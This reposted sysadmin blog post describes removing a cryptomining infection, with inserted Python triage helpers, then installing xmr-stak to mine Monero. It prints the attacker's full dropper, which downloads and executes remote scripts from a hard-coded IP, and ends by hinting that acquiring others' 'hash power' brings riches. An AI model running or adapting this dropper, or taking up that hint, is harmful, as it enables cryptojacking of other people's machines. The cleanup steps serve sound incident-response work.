As an operations engineer, protecting your own servers is a duty you cannot shirk. Day to day you have to watch out for unreliable developers, complicated environment configuration, the slip of the finger that can happen at any moment, and the occasional colleague's three-act play of joining, dropping the database and running off, all while guarding against the blows that outside attackers can deliver.

Recently I ran into a small problem of this kind. The attacker's methods were nothing special and it was easy to resolve. What I did not expect was that along the way I would also stumble on a small path to riches.

Origin

One day at noon, the testers reported that the production system was frequently returning 502 errors and responding extremely slowly.

At first I suspected one of the guys in the company was downloading movies, but other websites opened quickly. Then I wondered whether a surge in business traffic had filled the bandwidth, so I logged into the monitoring console: it showed only 80Mb in use, so the bandwidth was not saturated either.

Solving the problem

After ssh-ing into the server I ran top out of habit and found that a process named cranberry had nearly saturated the CPU.


So I tried killing the process:

kill -9 14465 

As soon as it was killed, cranberry restarted itself.

Staring at the screen, I was pleased to discover a crontab process. Aha, I thought, so that's the trick this guy uses.

So I listed the crontab:

crontab -l 

The listing contained a command that uses a scheduled job to download a script from a remote server.

So I removed the crontab:

crontab -r 

Then I assumed that once cranberry was killed everything would be fine, but it still restarted automatically.

There was nothing for it but to patiently download the script and study it. Its contents:

#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
pkill -f jIuc2ggfCAvYmluL2Jhc2gi
pkill -f lowerv2.sh
pkill -f rootv2.sh
pkill -f sourplum
pkill -f nativesvc
ps aux | awk '{if($3>20.0) print $2}' | while read procid
do
kill -9 $procid
done
whoami=$( whoami )
if [ ${whoami}x != "root"x ];then
    curl http://172.96.252.86/lowerv3.sh > /tmp/lower.sh
    if [ ! -f "/tmp/lower.sh" ] ;then
        wget -P /tmp/ http://172.96.252.86/lowerv3.sh
        rm /tmp/lower.sh.*
    fi
    chmod 777 /tmp/lower.sh
    bash /tmp/lower.sh
else
    curl http://172.96.252.86/rootv3.sh > /etc/root.sh
    if [ ! -f "/etc/root.sh" ] ;then
        wget -O /etc/root.sh http://172.96.252.86/rootv3.sh
    fi
    chmod 777 /etc/root.sh
    bash /etc/root.sh
fi
echo "over" 

The script is simple enough: its main job is to download another script into the /etc/ directory under the name root.sh.
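Beyond fetching the second stage, the script is worth reading as a whole: the `pkill -f` lines remove competing miners, and the `ps aux | awk '{if($3>20.0) print $2}'` loop kills any process using more than 20% CPU, which on a busy web server takes out legitimate workers too and is a plausible contributor to the 502 errors reported earlier. The Python below is an added triage example, not code from the post or from the malware: it pulls the contact hosts, dropped file paths, pkill targets and the CPU-kill threshold out of a dropper so they can go straight into blocking rules and detection. The script text embedded in it is the one quoted above; the base64 check on pkill targets is a heuristic for spotting encoded command-line fragments.

```python
import re
import json

# The dropper quoted in the post, embedded verbatim so the triage runs offline.
DROPPER = r"""#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
pkill -f jIuc2ggfCAvYmluL2Jhc2gi
pkill -f lowerv2.sh
pkill -f rootv2.sh
pkill -f sourplum
pkill -f nativesvc
ps aux | awk '{if($3>20.0) print $2}' | while read procid
do
kill -9 $procid
done
whoami=$( whoami )
if [ ${whoami}x != "root"x ];then
    curl http://172.96.252.86/lowerv3.sh > /tmp/lower.sh
    if [ ! -f "/tmp/lower.sh" ] ;then
        wget -P /tmp/ http://172.96.252.86/lowerv3.sh
        rm /tmp/lower.sh.*
    fi
    chmod 777 /tmp/lower.sh
    bash /tmp/lower.sh
else
    curl http://172.96.252.86/rootv3.sh > /etc/root.sh
    if [ ! -f "/etc/root.sh" ] ;then
        wget -O /etc/root.sh http://172.96.252.86/rootv3.sh
    fi
    chmod 777 /etc/root.sh
    bash /etc/root.sh
fi
echo "over"
"""

URL = re.compile(r"https?://[^\s'\"]+")
HOST = re.compile(r"https?://([^/\s:'\"]+)")
# Paths written by redirection (`> /path`), by wget -O, or made executable with chmod.
DROPPED = re.compile(r"(?:>\s*|\bwget\b[^\n]*?-O\s+|\bchmod\s+\S+\s+)(/\S+)")
# Targets of `pkill -f ...`: the competitors this dropper evicts.
PKILL = re.compile(r"^\s*pkill\s+(?:-\S+\s+)*(\S+)", re.M)
# An awk over `ps aux` that kills anything whose %CPU ($3) exceeds a threshold.
CPU_KILL = re.compile(r"ps\s+aux.*awk\s+'.*\$3\s*>\s*([0-9.]+)", re.S)
# Heuristic: long unbroken base64 alphabet, as used for encoded command lines.
BASE64ISH = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")

def triage_dropper(script: str) -> dict:
    """Extract the defender-relevant facts from a shell dropper: where it calls
    home, what it writes to disk, which competitors it kills and whether it
    kills by CPU usage."""
    cpu = CPU_KILL.search(script)
    pkill_targets = PKILL.findall(script)
    return {
        "urls": sorted(set(URL.findall(script))),
        "hosts": sorted(set(HOST.findall(script))),
        "dropped_paths": sorted(set(DROPPED.findall(script))),
        "pkill_targets": pkill_targets,
        "encoded_pkill_targets": [t for t in pkill_targets if BASE64ISH.match(t)],
        "cpu_kill_threshold": float(cpu.group(1)) if cpu else None,
    }

if __name__ == "__main__":
    print(json.dumps(triage_dropper(DROPPER), indent=2))
```

The dropped paths are what to check on disk (and what a file-integrity monitor should alert on), the hosts go into egress blocking, and the pkill targets are free indicators: names of other miner families that the same server may also be carrying, which matches the author's later finding of several more miners.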

So I checked which processes were executing the script:

root@SSP001:[/proc]ps -ef|grep root.sh
root      1541 28244  0 16:19 pts/1    00:00:00 grep root.sh
root      2036  1653  0 11:00 ?        00:00:57 bash /etc/root.sh
root      2080  1544  0 06:00 ?        00:01:21 bash /etc/root.sh
root      6035  5979  0 Jan15 ?        00:13:01 bash /etc/root.sh
root      8659  8156  0 05:00 ?        00:01:24 bash /etc/root.sh
root      9649  9627  0 Jan15 ?        00:07:03 bash /etc/root.sh
root      9979  9731  0 02:00 ?        00:03:12 bash /etc/root.sh
root     11925 11497  0 14:00 ?        00:00:16 bash /etc/root.sh
root     14874 14437  0 Jan15 ?        00:08:55 bash /etc/root.sh
root     14931 14794  0 Jan15 ?        00:12:22 bash /etc/root.sh
root     14935 13330  0 15:00 ?        00:00:00 bash /etc/root.sh
root     15050 14391  0 12:00 ?        00:00:32 bash /etc/root.sh
root     15596 15349  0 Jan15 ?        00:03:46 bash /etc/root.sh 
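The listing above shows the symptom but not the cure: every `bash /etc/root.sh` is a watchdog that respawns the miner, so killing cranberry alone achieves nothing (as the author found), and the watchdog's own parent tells you where the persistence lives. The following Python is an added example, not part of the original post: it parses a `ps -ef` listing into a process tree, collects each matching process together with all of its descendants in parent-first order, and reports what spawned each top-level match. The listing it runs on is constructed for the example and modelled on the author's output; the PIDs, the cron parent and the miner's place in the tree are made up.

```python
import re
from collections import defaultdict

# Constructed `ps -ef` listing for this example, modelled on the author's output.
# The author's listing is truncated and omits the parents, so PIDs, the cron
# parent and the miner's placement in the tree are made up here.
PS_EF = """\
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 Jan15 ?        00:00:03 /sbin/init
root      1544     1  0 Jan15 ?        00:00:00 /usr/sbin/cron -f
root      2080  1544  0 06:00 ?        00:01:21 bash /etc/root.sh
root     14465  2080  3 06:01 ?        05:12:33 ./cranberry
root      5979     1  0 Jan15 ?        00:00:00 /bin/sh -c bash /etc/root.sh
root      6035  5979  0 Jan15 ?        00:13:01 bash /etc/root.sh
www-data  3100  3099  0 06:00 ?        00:00:12 nginx: worker process
root     28244     1  0 16:10 pts/1    00:00:00 -bash
root      1541 28244  0 16:19 pts/1    00:00:00 grep root.sh
"""

def parse_ps_ef(text):
    """Map pid -> (ppid, cmd) from `ps -ef` output; CMD is the rest of the line."""
    procs = {}
    for line in text.splitlines()[1:]:          # skip the header row
        fields = line.split(None, 7)
        if len(fields) < 8:
            continue
        _uid, pid, ppid, _c, _stime, _tty, _time, cmd = fields
        procs[int(pid)] = (int(ppid), cmd)
    return procs

def kill_plan(procs, pattern):
    """Return (order, spawned_by): every process whose CMD matches `pattern` plus
    all of its descendants, listed parent-first so the watchdog dies before the
    worker it would respawn; spawned_by maps each top-level match to its parent's
    command line, which is where to look for the persistence mechanism."""
    rx = re.compile(pattern)
    children = defaultdict(list)
    for pid, (ppid, _cmd) in procs.items():
        children[ppid].append(pid)
    matches = {pid for pid, (_ppid, cmd) in procs.items()
               if rx.search(cmd) and not cmd.startswith("grep ")}   # not our own grep

    def has_matching_ancestor(pid):
        ppid = procs[pid][0]
        while ppid in procs:
            if ppid in matches:
                return True
            ppid = procs[ppid][0]
        return False

    roots = sorted(p for p in matches if not has_matching_ancestor(p))
    order, spawned_by = [], {}
    for root in roots:
        parent = procs[root][0]
        spawned_by[root] = procs[parent][1] if parent in procs else None
        stack = [root]
        while stack:                              # pre-order: parent before children
            pid = stack.pop()
            order.append(pid)
            stack.extend(sorted(children[pid], reverse=True))
    return order, spawned_by

def kill_command(order):
    """One kill for the whole tree, so nothing gets a chance to respawn in between."""
    return "kill -9 " + " ".join(str(pid) for pid in order)

if __name__ == "__main__":
    procs = parse_ps_ef(PS_EF)
    order, spawned_by = kill_plan(procs, r"root\.sh")
    for pid, parent_cmd in spawned_by.items():
        print(f"watchdog {pid} spawned by: {parent_cmd}")
    print(kill_command(order))
```

Note that the miner (14465) never matches the pattern itself; it is picked up as a child of a watchdog, which is the point: kill the tree from the top in one command, and read the spawned_by entries (here cron) to find what will recreate it otherwise.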

Kill the processes listed above:

kill -9 2036 2080 6035 8659 9649 9979 11925 14874 14931 14935 15050 15596 16459 17199 19983 20478 20795 21609 21810 23402 24943 25513 27988 28883 29853 31304 31499 32364 

Then kill cranberry again:

killall -9 cranberry 

This time it finally worked. Looking more closely, there seemed to be a few more mining trojans, and I took them out one by one using the same approach.

The path to riches unfolds

After dealing with the malware, I took the opportunity to look into CPU mining tools and came across xmr-stak-cpu.

A web search turned up its GitHub page, which seems to have been upgraded recently: github.com/fireice-uk/xmr-stak

There is also an earlier version at: github.com/fireice-uk/xmr-stak-cpu

I found a test machine and tried installing it:

# git clone https://github.com/fireice-uk/xmr-stak
# cd xmr-stak/
# ls
CI  CMakeLists.txt  CONTRIBUTING.md  doc  Dockerfile  LICENSE  README.md  scripts  THIRD-PARTY-LICENSES  xmrstak 

There did not seem to be any executable, but I noticed a Dockerfile and then found build_xmr-stak_docker.sh in the scripts folder. Does it automatically create a Docker container to mine in?

Let's open it and take a look:

# vim scripts/build_xmr-stak_docker/build_xmr-stak_docker.sh
#!/bin/bash -uex
if [[ $EUID -ne 0 ]]; then
echo "This script must be run as root"
exit 1
fi
if [ -d xmr-stak ]; then
git -C xmr-stak clean -fd
else
git clone https://github.com/fireice-uk/xmr-stak.git
fi
wget -c https://developer.nvidia.com/compute/cuda/9.0/Prod/local_installers/cuda_9.0.176_384.81_linux-run
chmod a+x cuda_*_linux-run
########################
# Fedora 27
########################
# CUDA is not going to work on Fedora 27 beacuse it's only support these distributions: http://docs.nvidia.com/cuda/cuda-installation-guide-linux/index.html
docker run --rm -it -v $PWD:/mnt fedora:27 /bin/bash -c "
set -x ;
dnf install -y -q cmake gcc-c++ hwloc-devel libmicrohttpd-devel libstdc++-static make openssl-devel;
cd /mnt/xmr-stak ;
cmake -DCUDA_ENABLE=OFF -DOpenCL_ENABLE=OFF . ;
make ;
"
test -d fedora_27 || mkdir fedora_27
mv xmr-stak/bin/* fedora_27
git -C xmr-stak clean -fd
########################
# Ubuntu (17.04)
########################
docker run --rm -it -v $PWD:/mnt ubuntu:17.04 /bin/bash -c "
set -x ;
apt update -qq ;
apt install -y -qq libmicrohttpd-dev libssl-dev cmake build-essential libhwloc-dev ;
cd /mnt/xmr-stak ;
/mnt/cuda_*_linux-run --silent --toolkit ;
cmake -DCUDA_ENABLE=OFF -DOpenCL_ENABLE=OFF . ;
... 

Sure enough, as expected: for CentOS- and Ubuntu-family Linux systems this script automatically builds a Docker image and installs xmr-stak in it. I edited the script to keep only one operating system; here I kept just the Ubuntu 17 part.

The original script deletes the container as soon as the build inside Docker finishes, but I wanted to keep the container, so I changed it; this is what it ended up as:

#!/bin/bash -uex
if [[ $EUID -ne 0 ]]; then
echo "This script must be run as root"
exit 1
fi
if [ -d xmr-stak ]; then
git -C xmr-stak clean -fd
else
git clone https://github.com/fireice-uk/xmr-stak.git
fi
########################
# Ubuntu (17.04)
########################
docker run -itd --name "xmr" -v $PWD:/mnt ubuntu:17.04 /bin/bash
docker exec -it "xmr" /bin/bash -c "
set -x ;
apt update -qq
apt install -y -qq libmicrohttpd-dev libssl-dev cmake build-essential libhwloc-dev ;
cd /mnt/xmr-stak ;
cmake -DCUDA_ENABLE=OFF -DOpenCL_ENABLE=OFF . ;
make install ;
"

My Linux box does not need CUDA, so I deleted the CUDA part of the code.

Run it directly (make sure Docker is installed before running it):

# ./build_xmr-stak_docker.sh
+ [[ 0 -ne 0 ]]
+ '[' -d xmr-stak ']'
+ git clone https://github.com/fireice-uk/xmr-stak.git
Cloning into 'xmr-stak'...
git-remote-https: /usr/local/lib/libldap_r-2.4.so.2: no version information available (required by /usr/lib/x86_64-linux-gnu/lib
git-remote-https: /usr/local/lib/liblber-2.4.so.2: no version information available (required by /usr/lib/x86_64-linux-gnu/libcu
remote: Counting objects: 3441, done.
remote: Compressing objects: 100% (29/29), done.
remote: Total 3441 (delta 16), reused 16 (delta 3), pack-reused 3409
Receiving objects: 100% (3441/3441), 1.01 MiB | 24.00 KiB/s, done.
Resolving deltas: 100% (2403/2403), done.
Checking connectivity... done.
+ docker run -itd --name xmr -v /data1/soft:/mnt update-ubuntu /bin/bash
f88a7614bd41821be42b584f76a1892184cd06155058c25c6bbdfb8c245cb571
+ docker exec -it xmr /bin/bash -c '
.....

The script includes apt-get update, which takes a while; if you feel you don't need it, you can remove it. If all the steps above completed normally, you can enter the container you just built and try mining:

# docker exec -it xmr /bin/bash
# cd /mnt/xmr-stak/bin/
# ls
libxmr-stak-backend.a  libxmr-stak-c.a  xmr-stak
# ./xmr-stak 
Please enter:
- Currency: 'monero' or 'aeon' 

Above, it asks you to choose the currency you want to mine, the pool address, the wallet address and so on; once these are set it runs automatically. If you see output like the following, the connection succeeded. For my test I used a domestic Monero pool, mine.ppxxmr.com:3333:

[2018-01-12 11:07:21] : Fast-connecting to mine.ppxxmr.com:3333 pool ...
[2018-01-12 11:07:21] : Pool mine.ppxxmr.com:3333 connected. Logging in...
[2018-01-12 11:07:21] : Difficulty changed. Now: 15000.
[2018-01-12 11:07:21] : Pool logged in.
[2018-01-12 11:07:29] : Difficulty changed. Now: 15000.
[2018-01-12 11:07:29] : New block detected.
[2018-01-12 11:07:37] : Result accepted by the pool.
[2018-01-12 11:07:47] : Result accepted by the pool.
[2018-01-12 11:08:04] : Difficulty changed. Now: 10465.
[2018-01-12 11:08:04] : New block detected.
[2018-01-12 11:08:11] : Result accepted by the pool.
[2018-01-12 11:08:17] : Result accepted by the pool. 

Your mining progress also appears on the pool's website, as shown in the figure below:

After terminating the process, I found two new files under bin, cpu.txt and config.txt:

# ls
config.txt  cpu.txt  libxmr-stak-backend.a  libxmr-stak-c.a  xmr-stak

Let's open it and take a look:

# vim config.txt
/*
* pool_address    - Pool address should be in the form "pool.supportxmr.com:3333". Only stratum pools are supported.
* wallet_address  - Your wallet, or pool login.
* pool_password   - Can be empty in most cases or "x".
* use_nicehash    - Limit the nonce to 3 bytes as required by nicehash.
* use_tls         - This option will make us connect using Transport Layer Security.
* tls_fingerprint - Server's SHA256 fingerprint. If this string is non-empty then we will check the server's cert against it.
* pool_weight     - Pool weight is a number telling the miner how important the pool is. Miner will mine mostly at the pool
*                   with the highest weight, unless the pool fails. Weight must be an integer larger than 0.
*
* We feature pools up to 1MH/s. For a more complete list see M5M400's pool list at www.moneropools.com
*/
"pool_list" :
[
{"pool_address" : "mine.ppxxmr.com:3333", "wallet_address" : "xxxxxxxxxqC4PTWdaAZ3V15d83kCEEGRiXVXeQwsS1PGd7s7wDjigA2grkxcsDfxEDtuDomBzpFiGtNyPMy+$NUMBER", "pool_password" : "", "use_nicehash" : false, "use_tls" : false, "tls_fingerprint" : "", "pool_weight" : 1 },
],
/*
* currency to mine
* allowed values: 'monero' or 'aeon'
*/
"currency" : "monero",
/* 

There is quite a lot in it; the settings from just now should all be stored here.

# vim cpu.txt
...
"cpu_threads_conf" :
[
{ "low_power_mode" : false, "no_prefetch" : true, "affine_to_cpu" : 0 },
{ "low_power_mode" : false, "no_prefetch" : true, "affine_to_cpu" : 2 },
{ "low_power_mode" : false, "no_prefetch" : true, "affine_to_cpu" : 4 },
{ "low_power_mode" : false, "no_prefetch" : true, "affine_to_cpu" : 6 },
{ "low_power_mode" : false, "no_prefetch" : true, "affine_to_cpu" : 8 },
{ "low_power_mode" : false, "no_prefetch" : true, "affine_to_cpu" : 10 },
{ "low_power_mode" : false, "no_prefetch" : true, "affine_to_cpu" : 1 },
{ "low_power_mode" : false, "no_prefetch" : true, "affine_to_cpu" : 3 },
{ "low_power_mode" : false, "no_prefetch" : true, "affine_to_cpu" : 5 },
{ "low_power_mode" : false, "no_prefetch" : true, "affine_to_cpu" : 7 },
{ "low_power_mode" : false, "no_prefetch" : true, "affine_to_cpu" : 9 },
{ "low_power_mode" : false, "no_prefetch" : true, "affine_to_cpu" : 11 },
], 

cpu.txt is the file for tuning CPU utilisation; if you think it is consuming too many resources, you can reduce it a bit.

OK, the next time it runs it no longer needs to be configured.

# nohup ./xmr-stak &
[1] 714 

Looking at resource consumption, the load instantly shot above 10, haha. With this little hash power and such a heavy load, a test is as far as we'll take it.


But if you can find a way to get hold of some hash power, the road to riches basically starts here~

Parts of this content come from the 51CTO bloggers feelgood3000 and storysky.

This article was reposted from the internet; if it infringes your rights, please contact us for removal.